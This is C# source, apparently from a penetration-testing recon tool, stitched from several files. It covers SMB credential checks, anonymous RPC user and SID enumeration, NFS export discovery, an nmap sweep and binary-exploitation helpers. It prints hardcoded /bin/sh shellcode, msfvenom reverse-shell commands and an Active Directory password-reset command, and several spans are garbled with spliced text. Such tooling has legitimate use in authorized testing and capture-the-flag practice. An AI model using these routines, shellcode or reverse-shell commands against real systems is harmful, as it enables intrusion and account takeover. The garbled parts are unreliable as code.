            // The credential is passed as "-Uuser%pass" on the smbclient command line, unquoted; the
            // verbatim @"-L \\\\" is four literal backslashes.
            List<string> outputResult = General.GetProcessOutput("smbclient", @"-L \\\\" + ip + " -U" + user + "%" + pass);
            outputResult.RemoveAll(x => x.Equals("Unable to initialize messaging context"));
            // Throws ArgumentOutOfRangeException when smbclient produced no (remaining) output.
            string resultItem = outputResult[0];
            if (resultItem.Contains("NT_STATUS_HOST_UNREACHABLE"))
            {
                Console.WriteLine("Error - Unable to contact \\\\" + ip);
                return;
            }
            else if (resultItem.Contains("NT_STATUS_LOGON_FAILURE"))
            {
                Console.WriteLine(user + ":" + pass + " - Failed");
            }
            else if (resultItem.Contains("NT_STATUS_UNSUCCESSFUL"))
            {
                Console.WriteLine("Fatal Error: " + resultItem);
                return;
            }
            else
            {
                // Anything other than the three statuses above is reported as a success, including
                // other NT_STATUS_* results such as a locked-out or expired account.
                Console.WriteLine(user + ":" + pass + " - Success!");
                return;
            }
        }
    }
    // smbclient -L \\\\10.10.10.172 -USABatchJobs%SABatchJobs
}
/// <summary>
/// Enumerates what a null session (-U ""%"") can read from the MS-RPC endpoint on <paramref name="ip"/>
/// via rpcclient: domain name (lsaquery), the user list (enumdomusers, each expanded by QueryEnumDomUser)
/// and, when no users come back, srvinfo, lsaenumsid + lookupsids, and a lookupnames/lookupsids probe of
/// well-known names and RIDs 1000-1010.
/// </summary>
/// <param name="ip">Host passed to rpcclient.</param>
/// <returns>Dash-bulleted text, one finding per line, ending with whether anonymous access was observed.
/// On non-Linux hosts or without /usr/bin/rpcclient, a single explanatory line.</returns>
private static string GetRPCInfo(string ip)
{
    string rpcInfo = "";
    // Set only by the lsaquery / srvinfo / lsaenumsid branches below. A successful enumdomusers
    // listing on its own does not set it, so the "No anonymous RPC access" footer can follow a user list.
    bool anonAccess = false;
    if (General.GetOS() == General.OS.Linux)
    {
        if (General.IsInstalledOnLinux("rpcclient", "/usr/bin/rpcclient"))
        {
            // Find the Domain Name
            List<string> domainNameList = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"lsaquery\"");
            domainNameList.RemoveAll(x => !x.StartsWith("Domain Name:"));
            if (domainNameList.Count == 1)
            {
                anonAccess = true;
                rpcInfo += "- " + domainNameList[0] + Environment.NewLine;
            }
            // Find basic users
            List<string> enumdomusersList = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"enumdomusers\"");
            if (enumdomusersList.Count == 0)
            {
                List<string> srvinfoList = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"srvinfo\"");
                if (srvinfoList.Count != 0)
                {
                    anonAccess = true;
                    rpcInfo += "- srvinfo: " + srvinfoList[0] + Environment.NewLine;
                }
                // Find public SIDs with lsaenumsid
                List<string> sidList = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"lsaenumsid\"");
                if (sidList.Count != 0)
                {
                    anonAccess = true;
                    rpcInfo += "- Found SIDs" + Environment.NewLine;
                    // Remove the "found X SIDs" text
                    sidList.RemoveAll(x => x.StartsWith("found "));
                    // Remove blanks
                    sidList.RemoveAll(x => string.IsNullOrEmpty(x));
                    string sidListString = string.Join(' ', sidList);
                    // Enumerate the rest - the SIDs are the remote host's own output and are placed
                    // unquoted inside the next -c argument.
                    List<string> sidResolution = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"lookupsids {sidListString}\"");
                    if (sidResolution.Count != 0)
                    {
                        foreach (string result in sidResolution)
                        {
                            rpcInfo += "-- " + result + Environment.NewLine;
                        }
                    }
                }
                // Find sneaky SIDs
                // NOTE: this -c argument has no closing \" (every other rpcclient call here has one).
                List<string> sneakyNameLookup = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"lookupnames administrator guest krbtgt root bin none");
                // NOTE(review): the text between "(User: " and "-") + 1) is garbled in this copy of the
                // file - the end of the RemoveAll lambda, the sneakySIDBaseList declaration and the loop
                // that derives each SID prefix (the two closing braces below belong to it) appear to be
                // missing. Verify against the repository before editing this region.
                sneakyNameLookup.RemoveAll(x => !x.Contains("(User: "******"-") + 1);
                        if (!sneakySIDBaseList.Contains(sneakySIDBase))
                        {
                            sneakySIDBaseList.Add(sneakySIDBase);
                        }
                    }
                }
                if (sneakySIDBaseList.Count != 0)
                {
                    List<string> sneakySIDList = new List<string>();
                    foreach (string sneakyBase in sneakySIDBaseList)
                    {
                        // Low ones are just system names - Can ignore them - Proper ones start from 1000
                        sneakySIDList.Add(sneakyBase + "1000");
                        sneakySIDList.Add(sneakyBase + "1001");
                        sneakySIDList.Add(sneakyBase + "1002");
                        sneakySIDList.Add(sneakyBase + "1003");
                        sneakySIDList.Add(sneakyBase + "1004");
                        sneakySIDList.Add(sneakyBase + "1005");
                        sneakySIDList.Add(sneakyBase + "1006");
                        sneakySIDList.Add(sneakyBase + "1007");
                        sneakySIDList.Add(sneakyBase + "1008");
                        sneakySIDList.Add(sneakyBase + "1009");
                        sneakySIDList.Add(sneakyBase + "1010");
                        // sneakySIDList is not cleared between bases, so each later base re-looks-up
                        // the earlier bases' SIDs as well.
                        List<string> sneakySIDLookup = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"lookupsids " + string.Join(" ", sneakySIDList) + "\"");
                        if (sneakySIDLookup.Count != 0)
                        {
                            foreach (string lookupResult in sneakySIDLookup)
                            {
                                // A result line without " (1)" makes IndexOf return -1 and Substring throw.
                                string name = lookupResult.Substring(0, lookupResult.IndexOf(" (1)"));
                                name = name.Remove(0, name.LastIndexOf("\\") + 1);
                                // Invalid ones simply have the number itself instead of the name
                                // A bit hacky, but it works
                                if (!int.TryParse(name, out int toIgnore))
                                {
                                    rpcInfo += "-- Sneaky Name Found: " + name + Environment.NewLine;
                                }
                            }
                        }
                    }
                }
            }
            else // Count > 0
            {
                string firstItem = enumdomusersList[0];
                // NOTE(review): this condition is garbled in this copy ("user:"******"rid:"); verify
                // against the repository before editing.
                if (firstItem.Contains("user:"******"rid:"))
                {
                    // All is fine
                    if (enumdomusersList.Count >= 3)
                    {
                        Console.WriteLine("Found a lot of useful RPC info - Output may take a few seconds longer than expected");
                    }
                    // NOTE: '=' here discards the "- Domain Name:" line appended above.
                    rpcInfo = "- User Listing" + Environment.NewLine;
                    foreach (string user in enumdomusersList)
                    {
                        // QueryEnumDomUser's normal result has its trailing newline trimmed and none is
                        // added here, so consecutive users run together.
                        rpcInfo += QueryEnumDomUser(ip, user);
                    }
                    // 23 -> https://room362.com/post/2017/reset-ad-user-password-with-linux/
                    rpcInfo += "--> rpcclient -> setuserinfo2 userNameHere 23 'newPasswordHere'" + Environment.NewLine;
                }
                else if (firstItem == "Cannot connect to server. Error was NT_STATUS_RESOURCE_NAME_NOT_FOUND")
                {
                    rpcInfo = "- Cannot connect - Are you sure it's up?" + Environment.NewLine;
                }
                else if (firstItem == "Cannot connect to server. 
Error was NT_STATUS_IO_TIMEOUT")
                {
                    rpcInfo = "- Cannot connect - It timed out :<" + Environment.NewLine;
                }
                else if (firstItem == "Cannot connect to server. Error was NT_STATUS_CONNECTION_DISCONNECTED")
                {
                    rpcInfo = "- Cannot connect - It kicks you out instantly" + Environment.NewLine;
                }
                else
                {
                    foreach (string item in enumdomusersList)
                    {
                        Console.WriteLine("Debug Info item: " + item);
                    }
                    rpcInfo = "- Unknown items in NETBIOS.GetRPCInfo - Bug Reelix (Check Debug Info Item output)" + Environment.NewLine;
                }
            }
            if (anonAccess == true)
            {
                rpcInfo += "- " + $"Anonymous access permitted! -> rpcclient -U \"\"%\"\" {ip}".Pastel(Color.Orange) + Environment.NewLine;
            }
            else
            {
                rpcInfo += "- No anonymous RPC access" + Environment.NewLine;
                // 23 -> https://room362.com/post/2017/reset-ad-user-password-with-linux/
                rpcInfo += "-- If you get access -> enumdomusers / queryuser usernameHere / setuserinfo2 userNameHere 23 'newPasswordHere'" + Environment.NewLine;
            }
        }
        else
        {
            rpcInfo = "- Error: Cannot find /usr/bin/rpcclient - Please install smbclient (Includes it)".Pastel(Color.Red) + Environment.NewLine;
        }
    }
    else
    {
        rpcInfo = "- No RPC Info - Try run on Linux (rpcclient)" + Environment.NewLine;
    }
    return(rpcInfo);
}
/// <summary>
/// Lists the NFS exports of <paramref name="target"/> with showmount -e and highlights exports that are
/// open to everyone (" (everyone)"), adding a mount hint for each.
/// </summary>
/// <param name="target">Host passed to showmount.</param>
/// <param name="port">Unused here.</param>
/// <returns>Windows: "- Files:" plus one "-- line" per export and a mount hint (or a message that
/// showmount.exe is missing). Linux: one "- line" per export with an orange mount hint under
/// world-readable ones; "" when showmount is not installed (no message is printed in that case) or on
/// other OSes. Surrounding newlines are trimmed.</returns>
public static string GetInfo(string target, int port)
{
    // TODO: https://svn.nmap.org/nmap/scripts/nfs-ls.nse
    string fileList = "";
    if (General.GetOS() == General.OS.Windows)
    {
        if (File.Exists(@"C:\Windows\System32\showmount.exe"))
        {
            List<string> outputLines = General.GetProcessOutput(@"C:\Windows\System32\showmount.exe", "-e " + target);
            if (outputLines.Count > 1)
            {
                // First line is showmount's "Exports list on ..." header.
                outputLines.RemoveAt(0);
                fileList = "- Files:" + Environment.NewLine;
                foreach (string line in outputLines)
                {
                    fileList += "-- " + line + Environment.NewLine;
                }
                fileList = fileList.Trim(Environment.NewLine.ToCharArray());
                fileList += Environment.NewLine + $"- To Mount --> mount \\\\{target}\\shareNameHere x:";
            }
            fileList = fileList.Trim(Environment.NewLine.ToCharArray());
            return(fileList);
        }
        else
        {
            fileList = "- showmount does not exist - Bug Reelix to update this section for more compatibility";
            return(fileList);
        }
    }
    else if (General.GetOS() == General.OS.Linux)
    {
        // Only /sbin/showmount is checked here; a showmount at /usr/sbin is not found.
        if (General.IsInstalledOnLinux("showmount", "/sbin/showmount") == true)
        {
            List<string> showmountOutput = General.GetProcessOutput("showmount", "-e " + target);
            foreach (string line in showmountOutput)
            {
                if (line.Contains(" (everyone)"))
                {
                    fileList += "- " + line.Pastel(Color.Orange) + Environment.NewLine;
                    fileList += "-- " + $"mount -t nfs -o vers=2 {target}:/mountNameHere /mnt".Pastel(Color.Orange) + Environment.NewLine;
                }
                else
                {
                    fileList += "- " + line + Environment.NewLine;
                }
            }
            return(fileList.Trim(Environment.NewLine.ToCharArray()));
            // The commented-out WMI code below is an unfinished Windows feature check; it is unreachable here.
            //
            // Windows
            //
            // ManagementClass objMC = new ManagementClass("Win32_ServerFeature"); // Only in Windows Server 2008 / R2
            /*
             * ManagementClass objMC = new ManagementClass("Win32_OptionalFeature");
             * ManagementObjectCollection objMOC = objMC.GetInstances();
             * foreach (ManagementObject objMO in objMOC)
             * {
             * //Console.WriteLine("Woof!");
             * string featureName = (string)objMO.Properties["Name"].Value;
             * if (!featureName.ToUpper().Contains("NFS"))
             * {
             * continue;
             * }
             * uint installState = 0;
             * try
             * {
             * installState = (uint)objMO.Properties["InstallState"].Value; // 1 = Enabled, 2 = Disabled, 3 = Absent, 4 = Unknown
             * }
             * catch
             * {
             * Console.WriteLine("Error - InstallState is: " + (string)objMO.Properties["InstallState"].Value);
             * }
             *
             * //add to my list
             * Console.WriteLine("Installed: " + featureName + " -> " + installState);
             * }
             */
        }
        // No else: a missing showmount falls through to return("") silently.
    }
    else
    {
        // NOTE(review): "Supportd" is a typo in a runtime message; left as-is here.
        Console.WriteLine("Error - OS Not Supportd - Bug Reelix");
    }
    return("");
}
/// <summary>
/// Runs the initial nmap port sweep of a target (-sS -p- at --min-rate=5000, via sudo on Linux) and
/// writes greppable output to "&lt;fileName&gt;.nmap" for the rest of reecon to parse.
/// </summary>
/// <param name="args">args[0] = target, args[1] = output file base name (prompted for when absent).
/// With no arguments the usage line is printed and the process exits.</param>
/// <param name="mustPing">false adds -Pn so nmap skips host discovery.</param>
/// <returns>The output file base name (without ".nmap").</returns>
public static string DefaultScan(string[] args, bool mustPing)
{
    // ip[0]
    // outputfile[1]
    if (args.Length < 1)
    {
        Console.WriteLine("Usage: ip outfile");
        // Every error path below exits with code 0, so a caller/script cannot tell failure from success.
        Environment.Exit(0);
    }
    string target = "";
    string fileName = "";
    if (args.Length == 1)
    {
        target = args[0];
        Console.WriteLine("Outfile name (1 word, no extension)");
        // Console.ReadLine returns null at end of input; that becomes "" once interpolated below.
        fileName = Console.ReadLine();
    }
    else if (args.Length == 2)
    {
        target = args[0];
        fileName = args[1];
    }
    // More than two arguments leaves both target and fileName empty and still runs the scan.
    if (General.GetOS() == General.OS.Windows)
    {
        List<string> nmapOutput = General.GetProcessOutput("nmap", "-V");
        if (nmapOutput.Count == 0 || !nmapOutput[0].Contains("https://nmap.org"))
        {
            Console.WriteLine("Error - nmap is not installed");
            Environment.Exit(0);
        }
    } // Check if nmap is installed
    else if (General.GetOS() == General.OS.Linux)
    {
        if (!General.IsInstalledOnLinux("nmap"))
        {
            Console.WriteLine("Error - nmap is not installed");
            Environment.Exit(0);
        }
    }
    else
    {
        Console.WriteLine("Error - There is no nmap detection on this OS :<");
        Environment.Exit(0);
    }
    DateTime beforeNmapDate = DateTime.Now;
    Console.WriteLine($"Doing an optimized Nmap scan on {target} - This may take awhile...");
    string noPing = mustPing ? "" : " -Pn ";
    // target and fileName are user input placed unquoted on the command line (under sudo on Linux);
    // how RunProcess tokenises them is not visible here.
    if (General.GetOS() == General.OS.Linux)
    {
        General.RunProcess($"sudo", $"nmap -sS -p- {noPing} --min-rate=5000 {target} -oG {fileName}.nmap");
    }
    else
    {
        General.RunProcess($"nmap", $"-sS -p- {noPing} --min-rate=5000 {target} -oG {fileName}.nmap");
    }
    // Wall-clock difference via DateTime.Now; a clock adjustment during the scan skews it.
    DateTime afterNmapDate = DateTime.Now;
    TimeSpan nmapScanDuration = afterNmapDate - beforeNmapDate;
    Console.WriteLine("Scan complete in " + string.Format("{0:0.00}s", nmapScanDuration.TotalSeconds) + $" - {fileName}.nmap for reecon");
    return(fileName);
}
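/// <summary>
/// Prints what the locally installed analysis tools (pwntools, ropper, rabin2, objdump)
/// report about the binary at <paramref name="fileName"/>. Each step is optional and is
/// skipped with a message when its tool is absent.
/// </summary>
/// <param name="fileName">
/// Relative "./" path to the binary. The prefix is required because the path is spliced
/// into a shell pipeline and its basename is matched against dmesg output.
/// </param>
/// <remarks>
/// All tool output is parsed positionally and should be treated as untrusted text: every
/// step guards against short or missing lines rather than assuming the expected layout.
/// </remarks>
private static void ScanFile(string fileName)
{
    if (!fileName.StartsWith("./", StringComparison.Ordinal))
    {
        Console.WriteLine("fileName must start with ./");
        return;
    }
    Architecture architecture = IDFile(fileName);
    if (architecture == Architecture.Linux86)
    {
        Console.WriteLine("Architecture: x86");
        if (General.IsInstalledOnLinux("pwn"))
        {
            ReportCyclicSegfaultPosition(fileName);
        }
        else
        {
            Console.WriteLine("- pwntools is not installed - Skipping auto segfault");
        }
    }
    else if (architecture == Architecture.Linux64)
    {
        Console.WriteLine("Architecture: x64");
        // TODO (kept from original): Find where it segfaults, -1
    }
    else if (architecture == Architecture.Windows)
    {
        Console.WriteLine("File Type: Windows (Unknown Architecture)");
    }
    else
    {
        Console.WriteLine("Architecture: Unknown - Bug Reelix to fix this!");
    }

    if (General.IsInstalledOnLinux("ropper"))
    {
        ReportRopperGadgets(fileName);
    }
    else
    {
        Console.WriteLine("- ropper is not installed (pip install ropper) - Skipping gadget check and string search");
    }

    if (General.IsInstalledOnLinux("rabin2"))
    {
        ReportNxState(fileName, architecture);
    }
    else
    {
        Console.WriteLine("- rabin2 is not installed (sudo apt install radare2 or https://github.com/radareorg/radare2/releases) - Skipping nx check");
    }

    if (General.IsInstalledOnLinux("objdump"))
    {
        ReportObjdumpSymbols(fileName);
    }
    else
    {
        Console.WriteLine("- objdump is not installed - Skipping syscalls");
    }
    Console.WriteLine("Finished");
}

/// <summary>
/// Runs the binary once with a fixed cyclic pattern on stdin, then reads the kernel's
/// "segfault at &lt;hex&gt;" line from dmesg and asks pwntools which pattern offset that
/// address corresponds to. Only used for the x86 branch of <see cref="ScanFile"/>.
/// </summary>
/// <param name="fileName">Relative "./" path to the binary (already validated by the caller).</param>
private static void ReportCyclicSegfaultPosition(string fileName)
{
    // The pattern is the stock 500-byte output of "pwn cyclic 500"; it is the only input the
    // target process receives.
    const string cyclicPattern = "aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae";
    const string segfaultMarker = "segfault at ";

    // The trailing 5 is presumably a timeout for General.RunProcess (the target is an
    // arbitrary binary that may block on stdin) - confirm against its definition.
    General.RunProcess("/bin/bash", " -c \"echo '" + cyclicPattern + "' | " + fileName + "\"", 5);

    // dmesg names the faulting process by basename, not by path.
    string baseName = fileName.TrimStart("./".ToCharArray());
    List<string> dmesgOutput = General.GetProcessOutput("dmesg", "");
    foreach (string item in dmesgOutput)
    {
        // e.g. "segfault at 6161616c ip 000000006161616c ..."
        int markerPos = item.IndexOf(segfaultMarker, StringComparison.Ordinal);
        if (markerPos < 0 || !item.Contains(baseName))
        {
            continue;
        }

        // Take the hex address up to the next space. The kernel omits leading zeros, so the
        // previous fixed nine-character slice could swallow part of " ip" for short addresses.
        string rest = item.Substring(markerPos + segfaultMarker.Length);
        int addressEnd = rest.IndexOf(' ');
        string segfaultHex = (addressEnd < 0 ? rest : rest.Substring(0, addressEnd)).Trim();
        if (segfaultHex.Length == 0)
        {
            continue;
        }

        // Decoded characters are reversed before the lookup, as in the original
        // (presumably because the address holds the pattern bytes little-endian).
        string pwntoolsSearch = new string(HEX2ASCII(segfaultHex).Reverse().ToArray());
        string pwnPos = General.GetProcessOutput("pwn", "cyclic -l " + pwntoolsSearch).FirstOrDefault();
        if (pwnPos == null)
        {
            // Previously an InvalidOperationException from First() on empty output.
            Console.WriteLine("- pwn cyclic returned no output for " + segfaultHex);
            continue;
        }
        Console.WriteLine("- Cyclic Segfault Overflow Position: " + pwnPos);
    }
}

/// <summary>
/// True for ropper result lines; ropper prefixes its own progress lines with [INFO]/[LOAD].
/// </summary>
private static bool IsRopperResultLine(string item)
{
    return !item.StartsWith("[INFO]", StringComparison.Ordinal) && !item.StartsWith("[LOAD]", StringComparison.Ordinal);
}

/// <summary>
/// Appends the "payload += p64(...)" hint the original printed next to an address,
/// using its last six hex digits. Callers decide which address lengths get the hint.
/// </summary>
private static string WithP64Hint(string pwnItem)
{
    return pwnItem + " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")";
}

/// <summary>
/// Runs the four ropper queries of the original scan (ret; / pop rdi; ret; / the "/bin/sh"
/// string / jmp esp;) and prints each hit in the same format as before.
/// </summary>
/// <param name="fileName">Relative "./" path to the binary.</param>
private static void ReportRopperGadgets(string fileName)
{
    // Result lines look like "<0x-address>: <gadget>"; the address length tells the bitness
    // (18 = 0x + 16 hex digits, 10 = 0x + 8 hex digits).
    List<string> ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --search \"ret;\"");
    foreach (string item in ropperOutput)
    {
        if (!IsRopperResultLine(item))
        {
            continue;
        }
        string pwnItem = item.Trim().Replace(": ret;", "");
        if (pwnItem.Length == 18) // x64
        {
            Console.WriteLine("- ret; (Only function calls) --> " + WithP64Hint(pwnItem));
        }
        else if (pwnItem.Length == 10) // x86
        {
            Console.WriteLine("- ret; (Only function calls) --> " + pwnItem);
        }
        else
        {
            Console.WriteLine("Error - Unknown ret length: " + pwnItem.Length);
        }
    }

    ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --search \"pop rdi; ret;\"");
    foreach (string item in ropperOutput)
    {
        if (!IsRopperResultLine(item))
        {
            continue;
        }
        if (!item.Contains(": pop rdi; ret;"))
        {
            Console.WriteLine("Unknown prr item: " + item);
            continue;
        }
        string pwnItem = item.Trim().Replace(": pop rdi; ret;", "");
        if (pwnItem.Length == 18)
        {
            // TODO (kept from original): p64 is only for x64 processes - Check first and implement x86 variant
            Console.WriteLine("- pop rdi; ret; (Can set values) --> " + WithP64Hint(pwnItem));
        }
        else
        {
            Console.WriteLine("Not 18 - " + pwnItem.Length);
        }
    }

    ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --string \"/bin/sh\"");
    foreach (string item in ropperOutput)
    {
        if (!IsRopperResultLine(item) || !item.Contains("/bin/sh"))
        {
            continue;
        }
        string pwnItem = item.Trim().Replace("/bin/sh", "").Trim();
        if (pwnItem.Length == 10)
        {
            // TODO (kept from original): this is a 10-character (x86-sized) address but the hint is p64 -
            // p64 is only for x64 processes - Check first and implement x86 variant
            pwnItem = WithP64Hint(pwnItem);
        }
        else
        {
            Console.WriteLine("Not 10 - " + pwnItem.Length);
        }
        Console.WriteLine("- /bin/sh --> " + pwnItem);
    }

    ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --search \"jmp esp;\"");
    foreach (string item in ropperOutput)
    {
        if (!IsRopperResultLine(item))
        {
            continue;
        }
        if (!item.Contains(": jmp esp;"))
        {
            Console.WriteLine("Unknown jmp esp Item: " + item);
            continue;
        }
        string pwnItem = item.Trim().Replace(": jmp esp;", "").Trim();
        if (pwnItem.Length == 10 && pwnItem.StartsWith("0x", StringComparison.Ordinal))
        {
            // 0x080414c3 -> 080414c3 -> "\xc3\x14\x04\x08" (byte order reversed)
            string hex = pwnItem.Substring(2);
            string jmpesp = string.Format("\\x{0}\\x{1}\\x{2}\\x{3}", hex.Substring(6, 2), hex.Substring(4, 2), hex.Substring(2, 2), hex.Substring(0, 2));
            Console.WriteLine("- jmp esp; --> " + pwnItem + " --> " + jmpesp);
        }
        else
        {
            Console.WriteLine("Invalid length - Bug Reelix!");
        }
    }
    // ropper --file sudo_pwn_file_here --string "/bin/sh"
}

/// <summary>
/// Reads rabin2's "nx" field (and, for Windows targets, "bits") and prints the same advisory
/// lines as before. A missing field now produces a message instead of a NullReferenceException.
/// </summary>
/// <param name="fileName">Relative "./" path to the binary.</param>
/// <param name="architecture">Result of <c>IDFile</c> for the same binary.</param>
private static void ReportNxState(string fileName, Architecture architecture)
{
    // fileName already starts with "./" (checked by ScanFile); the original prepended a second
    // "./", which resolves to the same path.
    List<string> rabin2Output = General.GetProcessOutput("rabin2", "-I " + fileName);
    string nxLine = rabin2Output.FirstOrDefault(x => x.Trim().StartsWith("nx"));
    if (nxLine == null)
    {
        Console.WriteLine("- rabin2 did not report an nx field - Skipping nx check");
        return;
    }
    if (nxLine.Contains("false"))
    {
        Console.WriteLine("- nx is disabled - You can run your own shellcode!");
        if (architecture == Architecture.Linux64) // bits ?
        {
            Console.WriteLine(@"Linux/x86-64 - Execute /bin/sh: \x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05");
        }
        else if (architecture == Architecture.Linux86)
        {
            Console.WriteLine(@"Linux/x86 - Execute /bin/sh: \x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80");
        }
        else if (architecture == Architecture.Windows)
        {
            // -f c = Format (Else it just parses raw bytes instead of showing them)
            // -b = Bad characters
            string bitsLine = rabin2Output.FirstOrDefault(x => x.Trim().StartsWith("bits")) ?? "";
            if (bitsLine.Contains("32"))
            {
                Console.WriteLine("-- Windows - x86 Reverse Shell: msfvenom -p windows/shell_reverse_tcp LHOST=ipHere LPORT=portHere -a x86 --platform windows -f c -b \"\\x00\"");
            }
            else if (bitsLine.Contains("64"))
            {
                Console.WriteLine("-- Windows - x64 Reverse Shell: msfvenom -p windows/shell_reverse_tcp LHOST=ipHere LPORT=portHere -a x64 --platform windows -f c -b \"\\x00\"");
            }
            else
            {
                // http://shell-storm.org/shellcode/
                Console.WriteLine("Unknown Inner Arch - Bug Reelix to fix his code!");
            }
        }
        else
        {
            // http://shell-storm.org/shellcode/
            Console.WriteLine("Unknown Outer Arch - Bug Reelix to fix his code!");
        }
    }
    else if (nxLine.Contains("true"))
    {
        Console.WriteLine("- nx enabled - No custom shellcode for you!");
    }
}

/// <summary>
/// Scans objdump disassembly, file header and symbol table output for the lines the original
/// reported (system calls, puts PLT/GOT entries, main or start address, global .text symbols).
/// </summary>
/// <param name="fileName">Relative "./" path to the binary.</param>
private static void ReportObjdumpSymbols(string fileName)
{
    bool hasMain = false;
    List<string> objdumpOutput = General.GetProcessOutput("objdump", $"-D {fileName}");
    foreach (string item in objdumpOutput)
    {
        string trimmed = item.Trim();
        if (item.Contains("call") && item.Contains("system")) // callq contains call
        {
            Console.WriteLine("- system --> " + item);
        }
        if (trimmed.EndsWith(" <puts@plt>:"))
        {
            Console.WriteLine("- puts@plt (plt_puts) --> " + item);
        }
        if (item.Contains("puts@GLIBC"))
        {
            Console.WriteLine("- puts@GLIBC (got_puts) --> " + item);
        }
        if (trimmed.EndsWith(" <main>:"))
        {
            hasMain = true;
            // The address is the first whitespace-delimited token; the EndsWith check above
            // guarantees the trimmed line contains a space.
            Console.WriteLine("- <main> Address: " + trimmed.Substring(0, trimmed.IndexOf(' ')));
        }
    }
    if (!hasMain)
    {
        // Stripped binaries have no <main> label; fall back to the entry point from the file header.
        objdumpOutput = General.GetProcessOutput("objdump", $"-f {fileName}");
        foreach (string item in objdumpOutput)
        {
            if (item.Trim().StartsWith("start address "))
            {
                Console.WriteLine("- " + item);
                break;
            }
        }
    }
    objdumpOutput = General.GetProcessOutput("objdump", $"-t {fileName}");
    foreach (string item in objdumpOutput)
    {
        // .text = section name, " g " = global binding in objdump -t output
        if (item.Contains(".text") && item.Contains(" g "))
        {
            Console.WriteLine("- Useful Symbol: " + item);
        }
    }
    // objdump -t ./file.elf | grep .text
}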